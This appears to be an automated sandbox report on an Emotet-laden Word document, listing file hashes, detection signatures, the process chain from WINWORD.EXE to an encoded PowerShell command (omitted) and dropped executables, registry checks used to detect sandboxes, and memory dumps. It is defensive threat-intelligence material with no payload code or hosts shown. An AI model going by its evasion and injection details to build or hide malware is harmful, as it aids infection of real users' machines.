Analysis
max time kernel: 26s
max time network: 28s
platform: windows10_x64
resource: win10
submitted: 14-10-2020 23:01
Static task: static1
General
Target: emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc
Size: 132KB
MD5: 40409631a9fb83e1ab8d02c2f8fa216d
SHA1: e6b8170c2ca200cb38d26a9ad836bc596d38ba6d
SHA256: a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc
SHA512: b83ee57533375a8642b71463cbdf27f9ccfdea2d71ed90f21c4bbe4942276c2519446d0c15548d36d985dd9b999be0f946934a8261b5e1a85a8adafc6c89e3ea
Malware Config
Extracted
Extracted
emotet
Epoch1
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1780 | 3252 | POwersheLL.exe | -

Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
Processes (resource | yara_rule):
  behavioral1/memory/976-13-0x0000000000710000-0x000000000072F000-memory.dmp | emotet
  behavioral1/memory/976-14-0x0000000000730000-0x000000000074E000-memory.dmp | emotet
  behavioral1/memory/1644-17-0x0000000002040000-0x000000000205F000-memory.dmp | emotet
  behavioral1/memory/1644-18-0x0000000002060000-0x000000000207E000-memory.dmp | emotet

Blacklisted process makes network request (3 IoCs)
Processes (flow | pid | process):
  14 | 1780 | POwersheLL.exe
  16 | 1780 | POwersheLL.exe
  18 | 1780 | POwersheLL.exe

Executes dropped EXE (2 IoCs)
Processes (pid | process):
  976 | V9ofyxp.exe
  1644 | credprovslegacy.exe

Drops file in System32 directory (1 IoC)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\SysWOW64\ole2nls\credprovslegacy.exe | V9ofyxp.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes (pid | process):
  3612 | WINWORD.EXE (2 entries)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes (pid | process):
  1780 | POwersheLL.exe (3 entries)
  1644 | credprovslegacy.exe (4 entries)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 1780 | POwersheLL.exe

Suspicious use of SetWindowsHookEx (11 IoCs)
Processes (pid | process):
  3612 | WINWORD.EXE (9 entries)
  976 | V9ofyxp.exe
  1644 | credprovslegacy.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes (description | pid | process | target process):
  PID 1780 wrote to memory of 976 | 1780 | POwersheLL.exe | V9ofyxp.exe (3 entries)
  PID 976 wrote to memory of 1644 | 976 | V9ofyxp.exe | credprovslegacy.exe (3 entries)
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc" /o ""
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
  Command line: POwersheLL -ENCOD [encoded command omitted]
  Signatures: Process spawned unexpected child process; Blacklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe
  Command line: "C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe"
  Signatures: Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\ole2nls\credprovslegacy.exe
  Command line: "C:\Windows\SysWOW64\ole2nls\credprovslegacy.exe"
  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
Downloads

C:\Users\Admin\B20DYak\ovPQHo4\V9ofyxp.exe
  MD5: 9df4614f28b9b04ca2e2416d9344289f
  SHA1: 70372b65059420f08691667078e8bf3555554ec9
  SHA256: 7b1a3968b858a99720918ec4791ea586d8f9466be36f0defc669189398a6901d
  SHA512: 0466e00ca4eb065f2f19acb895378c4a01efda52fd20d02cc44f7e5fed2929454612897aaedf4866b9d388bba050639c6e39b5b62bd8fa70f399fe5a085497c1

C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe
  MD5: 9df4614f28b9b04ca2e2416d9344289f
  SHA1: 70372b65059420f08691667078e8bf3555554ec9
  SHA256: 7b1a3968b858a99720918ec4791ea586d8f9466be36f0defc669189398a6901d
  SHA512: 0466e00ca4eb065f2f19acb895378c4a01efda52fd20d02cc44f7e5fed2929454612897aaedf4866b9d388bba050639c6e39b5b62bd8fa70f399fe5a085497c1

C:\Windows\SysWOW64\ole2nls\credprovslegacy.exe
  MD5: 9df4614f28b9b04ca2e2416d9344289f
  SHA1: 70372b65059420f08691667078e8bf3555554ec9
  SHA256: 7b1a3968b858a99720918ec4791ea586d8f9466be36f0defc669189398a6901d
  SHA512: 0466e00ca4eb065f2f19acb895378c4a01efda52fd20d02cc44f7e5fed2929454612897aaedf4866b9d388bba050639c6e39b5b62bd8fa70f399fe5a085497c1

Memory dumps (resource, file size):
  memory/976-10-0x0000000000000000-mapping.dmp
  memory/976-14-0x0000000000730000-0x000000000074E000-memory.dmp (120KB)
  memory/976-13-0x0000000000710000-0x000000000072F000-memory.dmp (124KB)
  memory/1644-18-0x0000000002060000-0x000000000207E000-memory.dmp (120KB)
  memory/1644-17-0x0000000002040000-0x000000000205F000-memory.dmp (124KB)
  memory/1644-15-0x0000000000000000-mapping.dmp
  memory/1780-8-0x00000185DC9E0000-0x00000185DC9E1000-memory.dmp (4KB)
  memory/1780-9-0x00000185DCB90000-0x00000185DCB91000-memory.dmp (4KB)
  memory/1780-7-0x00007FFA14880000-0x00007FFA1526C000-memory.dmp (9MB)
  memory/3612-0-0x00007FFA1BCF0000-0x00007FFA1C3B6000-memory.dmp (6MB)
  memory/3612-6-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmp (20KB)
  memory/3612-5-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmp (20KB)
  memory/3612-4-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmp (20KB)
  memory/3612-3-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmp (20KB)
  memory/3612-2-0x000001E3F4376000-0x000001E3F437B000-memory.dmp (20KB)
  memory/3612-1-0x000001E3F6995000-0x000001E3F699A000-memory.dmp (20KB)